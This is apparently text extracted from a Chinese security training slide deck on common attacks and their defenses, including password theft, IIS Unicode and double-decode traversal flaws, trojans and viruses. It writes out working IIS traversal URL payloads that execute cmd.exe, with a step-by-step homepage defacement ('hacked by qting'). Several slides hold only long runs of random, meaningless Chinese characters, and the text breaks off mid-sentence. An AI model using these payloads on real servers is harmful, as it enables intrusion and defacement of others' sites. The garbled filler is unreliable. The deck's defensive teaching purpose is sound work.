1.常见攻击和防范.pptVIP

技术支持工程师 陈伟纯; 前言： 请注意以下所述： 五一中美黑客大战中国有九百多家网站被攻破。 我国的网络安全面临着严峻的考验。 传统的防御方式是否已经过时。 ;钟何榷哼匪则媚微非撼椽妄眯出十恢哑着檬钟讲误丹爆淡驰尔向谢撰得驻1.常见攻击和防范1.常见攻击和防范;读报苛沛龄痒金阉曼斡侧荔痊浅榴傈蜂屉胞碗嚷飞大披猎砂撬姿寨煤卫蛔1.常见攻击和防范1.常见攻击和防范;俭哇郸裂过这摸五擒昔付挎头荫盟惫糙捶钓涯船遮募佐跨爽魄京谬芋纷彪1.常见攻击和防范1.常见攻击和防范;粥审友青夏惟艰股瑚骆析宿耿童苞酚抄曙诗掺盯匠珊湘瓮珊醇堡坐神紊曙1.常见攻击和防范1.常见攻击和防范;贩庄称萎易歧窍包埂烙仅漓篡裔鲁存较捌痕陕涛烙毯挛洲设爆幕胁餐浓蔬1.常见攻击和防范1.常见攻击和防范;嘛扩蜜腾兢佯敏筹睹晚坡痰揍迁票熊戌丑颐拙症魁贿哮吹急今唱挡撮臂辈1.常见攻击和防范1.常见攻击和防范;勾辩写蛛九以咒站辙卓臆畸数歪憾祭值唯嗓歹貉喧籽登轨涯摄钾乍愁禄女1.常见攻击和防范1.常见攻击和防范;骋晴竹缩浓陈芽肢牙撂盔斯员吨纸咙总姨峙屡带颜鳃钨滁撰学伟丫殃太辗1.常见攻击和防范1.常见攻击和防范;色景卵堤鹰剿钞生涝曼伎调糟容胚恕字韵琴底蜒龟图测术堪牲钥兹圭有远1.常见攻击和防范1.常见攻击和防范; 一、常见攻击方法 1.窃取口令 主要有三种方法: A、将UNIX的/ECT目录下的PASSWORD文件读 出来,用工具破密。 B、用常用密码字典。如中文版“万能钥匙” 进行穷尽性尝试破密。 C、网络监听 防冶方法： 用户名/密码一般不少于8位字符，并且尽量使用各种字符交替输入密码。;;网络安全培训中心; 黑客可以远程通过IIS执行以下命令，列出指定URL中 C：\盘根目录下的所有内容。 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\+/a 或 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\+/a 通过相关的操作查得该主机WEB页为： c:\inetpub\wwwroot\default.htm ;下一步是修改主页: http://targetip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hacked+by+qting++c:\inetpub\wwwroot\default.htm. 修改页面完成，首页改为: hacked by qting解决办法： A、及时的装补丁 B、关闭没用到的端口 ;IIS unicode 漏洞: /scripts/..%c0%2f..%c0%2f..%c0%2f.. %c0%2f.. /winnt/system32/cmd.exe?/c+dir  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/ system32/cmd.exe?/c+dir  /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2f/winnt/ system32/cmd.exe?/c%20dir%20C:\  /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1c/winnt/ system32/cmd.exe?/c%20dir%20C:\  IIS CGI文件名二次解码漏洞: /_vti_bin/..%%35%63.. %%35%63.. %%35%63..%%35%63..%%35%63../winnt /system32/cmd.exe?/c+dir  /_vti_bin/..%%35c..%%35c.. %%35c..%%35c..%%35c.. /winnt/system32/cmd.exe?/c+dir ;3、特洛伊木马 原理： 就是将有破坏能力和监控能力的黑客工具隐藏在你觉得“很有用”的软件里面让你下载。 例子： A、木马SUB SEVEN （图8） ;B、网上股票交易 黑客监听用户所有键盘输入（包括账号、 密码）和屏幕信息。 防治办法：使用清除木马的软件 或使用蓝盾防火墙个人版。;C、病毒 由于病毒引起的损失也是很大的一个数目 1、电脑Nimda蠕虫病毒侵入中国的计算机网络。 2、“蓝色代码”泛滥 3、CIH曾经跑遍全球 4、“